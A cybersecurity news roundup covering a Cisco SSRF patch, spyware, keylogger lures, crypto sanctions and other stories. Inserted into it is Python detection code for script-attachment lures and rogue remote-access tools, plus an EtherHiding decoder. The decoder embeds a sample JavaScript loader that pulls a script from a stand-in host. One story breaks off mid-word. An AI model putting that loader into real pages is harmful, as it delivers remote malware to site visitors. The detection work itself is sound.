Threat Intelligence, Jun 4, 2026

ThreatsDay Bulletin: AI Agents Gone Wrong, Sketchy C2 Tools, ClickFix Tricks, JS Backdoors & 20+ New Stories

ThreatsDay roundup covers Cisco UCM SSRF flaw, Russian spyware ops, VIP Keylogger campaigns, and crypto sanctions.

Summary

This threat intelligence bulletin aggregates multiple security stories including a high-severity Cisco Unified Communications Manager SSRF vulnerability (CVE-2026-20230), Russian FSB disclosure of foreign intelligence spyware targeting officials, social engineering campaigns distributing VIP Keylogger via JavaScript and script loaders, and U.S. Treasury sanctions against Iran's Nobitex crypto exchange for facilitating terrorist payments and ransomware funding. The article frames a broader trend of escalating threat sophistication and persistent security infrastructure failures.

Full text

Ravie Lakshmanan, Jun 04, 2026, Hacking News / Cybersecurity News

It got stupid again. The internet still feels held together with tape. Bad plugins, old bugs, fake tools, trusted apps doing shady things. Same mess, new wrapper. And now the weird stuff is normal. Forums go down and come back worse. Cheap hackers get better toys. AI starts breaking real systems. Great. Read the whole thing before it ruins your week anyway.

Unauthenticated SSRF risk
Cisco Patches Unified Communications Manager Flaw

Cisco has released fixes to address a high-severity security flaw in Unified Communications Manager (CVE-2026-20230, CVSS score: 8.6) that could allow an unauthenticated, remote attacker to conduct server-side request forgery (SSRF) attacks through an affected device. "This vulnerability is due to improper input validation for specific HTTP requests," Cisco said. "An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to write files to the underlying operating system that could be used later to elevate to root." The issue has been addressed in Cisco Unified CM and Unified CM SME Release versions 14SU6 and 15SU5. Cisco said it's aware of the availability of proof-of-concept exploit code for the flaw, but noted there is no evidence of active exploitation. It credited an independent security researcher working with SSD Secure Disclosure for reporting the vulnerability.

Mobile spyware operation
Russia Claims Large-Scale Operation Targeting High-Ranking Officials

Russia's Federal Security Service (FSB) has disclosed details of what it described as a "large-scale action" undertaken by foreign intelligence services to stealthily implant spyware on the mobile devices of high-ranking officials in the country.
"This software was utilized to exfiltrate existing data, intercept ongoing conversations, and conduct covert audio and video surveillance of the immediate surroundings of the electronic devices, with the ultimate objective of obtaining sensitive information," the FSB said. Russia did not reveal who was behind the attacks, but noted the "representatives of foreign intelligence services" leveraged the technical capabilities of major international IT corporations to exfiltrate sensitive data from the devices. This specifically included the exploitation of mobile communication channels, the agency added. An investigation into the activity is ongoing, with the FSB also initiating a criminal case to investigate the matter.

Layered keylogger lures
VIP Keylogger Campaigns Analyzed

Threat actors have been relying on social engineering over the past few months to push VIP Keylogger via loaders written in JavaScript, batch scripts, and Visual Basic Script (VBS). "Attackers are masquerading as legitimate business communications such as bank payment notifications, procurement orders, and logistics updates to lure users into opening malicious files," Splunk said.

Crypto sanctions escalation
U.S. Sanctions Nobitex Crypto Exchange

The U.S. Treasury's Office of Foreign Assets Control (OFAC) has announced sanctions against Nobitex, Iran's largest cryptocurrency exchange, for facilitating payments related to terrorist activities. "Nobitex has provided significant support to the regime, processing more than 50 percent of all Iranian digital asset inflows in 2025 and facilitating payments tied to Iran's terrorist activities, sanctions evasion efforts, and Islamic Revolutionary Guard Corps (IRGC)-linked transactions, including activity associated with IRGC-affiliated ransomware actors," the Treasury said.
The sanctions also extend to Nobitex's chairman, co-founder, and former CEO, Amir Hossein Rad, as well as other Nobitex leaders and officials, and three other exchanges: Wallex, Bitpin, and Ramzinex. According to Chainalysis, Nobitex processed over 50% of all Iranian digital asset inflows last year. The four exchanges accounted for roughly $7.7 billion, 78% of Iran's $9.9 billion in attributed 2025 crypto volume, per TRM Labs.

Cybercrime forum fallout
XSS Takedown Fractures Cybercrime Underground

The July 2025 law enforcement takedown of XSS, a prominent Russian-speaking cybercrime forum, didn't dismantle the ecosystem. Rather, it fractured it into competing, harder-to-track factions, Flashpoint said. The collapse has triggered an exodus into new, unvetted, and often adversarial communities. Some of the new forums that have rushed to fill the void left by XSS include DamageLib (launched by legacy moderators of XSS), Rehub (launched by another former XSS moderator), XSS.pro (a resurrection using old backups and suspected to be a law-enforcement honeypot), and XSSF (started by a pro-Russian Telegram hacking group).

RMM abuse surge
Malicious Use of Tiflux in Attacks Surges

A lesser-known remote desktop tool called Tiflux is being used in a growing number of attacks to establish persistence, transmit screenshots, and run commands to collect system profiling information. "Threat actors behind the rogue Tiflux incidents also installed UltraVNC, an open-source remote access tool, sideloaded other commercial RMMs, including Splashtop and ScreenConnect, and installed an outdated driver that can permit the threat actor to elevate their own privileges on an infected system," Huntress said. "Threat actors continue to test and weaponize the use of commercial remote access management tools."
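Two of the stories above, the VIP Keylogger loaders and the Tiflux intrusions, describe activity a responder can hunt for in mail-gateway and endpoint telemetry: script attachments (.js, .vbs, .bat) dressed up as payment, procurement or logistics paperwork, and remote-access tools plus an out-of-baseline driver appearing on a host that never had them. The following is an added example written for this bulletin, not code from the page, Splunk or Huntress. The event schema, the executable names mapped to each tool, the approved-RMM list, the driver baseline and every sample event are constructed assumptions; adapt them to your own telemetry.

```python
"""Detection checks for the VIP Keylogger loader lures and the Tiflux-style
RMM abuse described in the bulletin. Added example; schema, image names,
allowlist and sample events are assumptions, not vendor data."""
from dataclasses import dataclass, field
import re


@dataclass
class Event:
    """Assumed normalized record (not a real SIEM schema)."""
    kind: str            # "attachment", "process" or "driver"
    host: str
    data: dict = field(default_factory=dict)


# Script loader types named in the VIP Keylogger story (JS, batch, VBS)
# plus the encoded/WSF variants a gateway commonly sees.
SCRIPT_EXT = re.compile(r"\.(js|jse|vbs|vbe|bat|cmd|wsf)$", re.IGNORECASE)
# Lure themes named by Splunk: payment, procurement and logistics traffic.
LURE_WORDS = re.compile(
    r"(payment|invoice|remittance|swift|purchase.?order|\bpo\b|procurement|"
    r"shipment|shipping|delivery|awb|bill.?of.?lading)", re.IGNORECASE)


def rule_script_loader_lure(ev: Event):
    """Script attachment whose name/subject mimics business paperwork,
    or that hides behind a double extension such as invoice.pdf.js."""
    if ev.kind != "attachment":
        return None
    name = ev.data.get("filename", "")
    if not SCRIPT_EXT.search(name):
        return None
    text = f"{name} {ev.data.get('subject', '')}"
    double_ext = len(re.findall(r"\.[a-z0-9]{2,4}", name, re.IGNORECASE)) > 1
    if LURE_WORDS.search(text) or double_ext:
        return f"script loader lure: {name!r} on {ev.host}"
    return None


# Tools Huntress saw in the Tiflux intrusions, keyed by an assumed process
# image name for each (verify against your own inventory).
RMM_IMAGES = {
    "tiflux.exe": "Tiflux",
    "winvnc.exe": "UltraVNC",
    "srserver.exe": "Splashtop",
    "screenconnect.clientservice.exe": "ScreenConnect",
}
APPROVED_RMM = {"ScreenConnect"}   # assumed: the organisation's sanctioned tool


def rule_unapproved_rmm(ev: Event):
    """Any known remote-access binary that is not the sanctioned one."""
    if ev.kind != "process":
        return None
    image = ev.data.get("image", "").lower().rsplit("\\", 1)[-1]
    product = RMM_IMAGES.get(image)
    if product and product not in APPROVED_RMM:
        return f"unapproved remote-access tool {product} ({image}) on {ev.host}"
    return None


def rule_driver_outside_baseline(ev: Event, baseline=frozenset()):
    """Kernel driver service not in the gold-image baseline: the Tiflux
    actors dropped an outdated driver as a privilege-escalation path."""
    if ev.kind != "driver":
        return None
    name = ev.data.get("service", "")
    if name and name.lower() not in baseline:
        return f"new kernel driver service {name!r} on {ev.host}"
    return None


def run_rules(events, baseline=frozenset()):
    """Return the list of human-readable hits for a batch of events."""
    hits = []
    for ev in events:
        for rule in (rule_script_loader_lure, rule_unapproved_rmm):
            hit = rule(ev)
            if hit:
                hits.append(hit)
        hit = rule_driver_outside_baseline(ev, baseline)
        if hit:
            hits.append(hit)
    return hits


# Constructed sample telemetry: two lures, one benign script, one host with
# Tiflux + UltraVNC + the approved RMM, and two driver loads.
SAMPLE_EVENTS = [
    Event("attachment", "ws-14", {"filename": "Payment_Advice_0423.pdf.js",
                                  "subject": "Bank payment notification"}),
    Event("attachment", "ws-14", {"filename": "report.js", "subject": "weekly build"}),
    Event("attachment", "ws-09", {"filename": "PO-88712.vbs", "subject": "Procurement order"}),
    Event("process", "srv-02", {"image": r"C:\Users\Public\tiflux.exe"}),
    Event("process", "srv-02", {"image": r"C:\Program Files\uvnc\winvnc.exe"}),
    Event("process", "srv-02", {"image": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe"}),
    Event("driver", "srv-02", {"service": "oldvuln"}),
    Event("driver", "srv-02", {"service": "disk"}),
]
GOLD_DRIVERS = frozenset({"disk", "ndis", "tcpip"})   # assumed baseline

if __name__ == "__main__":
    for line in run_rules(SAMPLE_EVENTS, GOLD_DRIVERS):
        print(line)
```

On the sample data the rules fire five times: the two business-themed script attachments, the Tiflux and UltraVNC images on srv-02, and the unknown driver service; the developer's `report.js` and the sanctioned ScreenConnect client stay quiet. The driver rule is deliberately baseline-driven rather than signature-driven because the bulletin only says the driver was "outdated", not which one.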
Malware delivery network
DriveSurge Linked to ClickFix and FakeUpdates Campaigns

A threat cluster tracked as DriveSurge has been operating large-scale malware distribution campaigns using ClickFix and FakeUpdates (aka SocGholish) social engineering techniques on compromised sites. Thousands of websites are estimated to have been compromised, directing users to malicious infrastructure. DriveSurge primarily acts as an initial access broker (IAB) operating on a pay-per-install (PPI) model, enabling follow-on attacks. Visitors to compromised websites are steered through a traffic distribution system (TDS) known as zTDS, which profiles the system and decides whether the visitor should be served a ClickFix or a FakeUpdates lure. zTDS, in use since at least 2015, is publicly available at ztds[.]info. "Using zTDS, DriveSurge hijacks thousands of legitimate, high-reputation websites and silently redirects visitors to malware, unbeknownst to the sites' owners or their visitors," Silent Push said. The campaign has been active since September 2025.

Sensitive data leak
Spain Arrests Suspect for Leaking Sensitive Data

The Spanish National Police has arrested an unidentified individual for leaking sensitive information related to members of various critical state organizations, including the National Cybersecurity Institute (INCIBE), the State Attorney General's Office, the National Police, the Civil Guard, and the National Security Council.

JavaScript backdoor malspam
Malspam Distributes JavaScript Backdoor

Intrinsec has disclosed that multiple malspam campaigns have been used to distribute a JavaScript-coded backdoor. "The targets of those campaigns were from all regions and sectors, notably energy and finance ministries, including in the CIS region," the company said. "We believe the campaigns to be financially motivated and operated for email account compromise (EAC) and/or business email compromise (BEC)." The activity was observed in March 2026.
On-chain malware delivery
ClearFake Campaign Leverages EtherHiding

Cybersecurity researchers have flagged an intrusion in which threat actors used the EtherHiding technique to route ClearFake payload delivery through smart contracts on the BNB Smart Chain testnet. "The attack chain ended with two simultaneously deployed stealers, SectopRAT and ACRStealer, alongside an on-chain execution tracker that confirmed each victim compromise in real time," Trend Micro said.

Cloud atta
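What makes the EtherHiding story above hard to take down is the delivery mechanism: the JavaScript injected into a compromised site reads its next stage from a smart contract with a read-only `eth_call` against a public RPC endpoint, and the payload comes back as an ABI-encoded `string` that the loader decodes and executes. An analyst who captures that JSON-RPC response can recover the stage offline with the same decoding. The block below is an added example, not code from the page, Trend Micro or the ClearFake operators; the contract address, function selector, RPC response and stage-2 script are constructed placeholders, while the ABI layout (offset word, length word, right-padded bytes) is the real Ethereum ABI encoding.

```python
"""Decode an EtherHiding stage from a captured eth_call response.
Added example; the request, response and payload are constructed."""
import hashlib
import re

# Constructed shape of the loader's read: a view function with no arguments.
# The 4-byte selector is a placeholder (real selectors are keccak256 of the
# signature, which the standard library cannot compute).
SAMPLE_RPC_REQUEST = {
    "jsonrpc": "2.0", "id": 1, "method": "eth_call",
    "params": [{"to": "0x" + "11" * 20, "data": "0x" + "aa" * 4}, "latest"],
}


def abi_encode_string(s: str) -> str:
    """Inverse of the decoder; used only to build the constructed response."""
    data = s.encode("utf-8")
    padded = data + b"\x00" * ((32 - len(data) % 32) % 32)
    head = (32).to_bytes(32, "big") + len(data).to_bytes(32, "big")
    return "0x" + (head + padded).hex()


def abi_decode_string(hex_data: str) -> str:
    """Decode a single ABI-encoded `string` return value.
    Layout: [offset 32B][length 32B][utf-8 bytes, right-padded to 32B]."""
    raw = bytes.fromhex(hex_data[2:] if hex_data.startswith("0x") else hex_data)
    if len(raw) < 64 or len(raw) % 32:
        raise ValueError("not a well-formed ABI word stream")
    offset = int.from_bytes(raw[:32], "big")
    if offset + 32 > len(raw):
        raise ValueError("offset points past the payload")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(raw):
        raise ValueError("declared length runs past the payload")
    return raw[start:start + length].decode("utf-8")


# Constructed stage 2: the kind of one-liner a loader would eval to pull the
# next script from attacker infrastructure (example.invalid is reserved).
STAGE2 = ("(function(){var s=document.createElement('script');"
          "s.src='https://example.invalid/u.js';document.head.appendChild(s)})();")
SAMPLE_RPC_RESPONSE = {"jsonrpc": "2.0", "id": 1, "result": abi_encode_string(STAGE2)}

URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def extract_stage(rpc_response: dict) -> dict:
    """Turn a captured eth_call response into triage data: the decoded
    code, its hash, and any URLs it reaches out to."""
    code = abi_decode_string(rpc_response["result"])
    return {
        "sha256": hashlib.sha256(code.encode("utf-8")).hexdigest(),
        "length": len(code),
        "urls": URL_RE.findall(code),
        "code": code,
    }


if __name__ == "__main__":
    info = extract_stage(SAMPLE_RPC_RESPONSE)
    print(info["sha256"], info["length"], info["urls"])
    print(info["code"])
```

Because the read is a no-gas `eth_call`, nothing about the victim's fetch lands on the chain; only the operator's own writes (such as updating the stored payload, or the "execution tracker" Trend Micro mentions) do. In practice the contract address and selector come out of the injected JavaScript on the compromised site, and the decoder above recovers whatever the contract currently returns.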

Indicators of Compromise

  • cve — CVE-2026-20230
  • malware — VIP Keylogger

Entities

  • Cisco (vendor)
  • Cisco Unified Communications Manager (product)
  • Foreign intelligence services (Russia FSB disclosure) (threat_actor)
  • Nobitex (organization)
  • SSRF (Server-Side Request Forgery) (technology)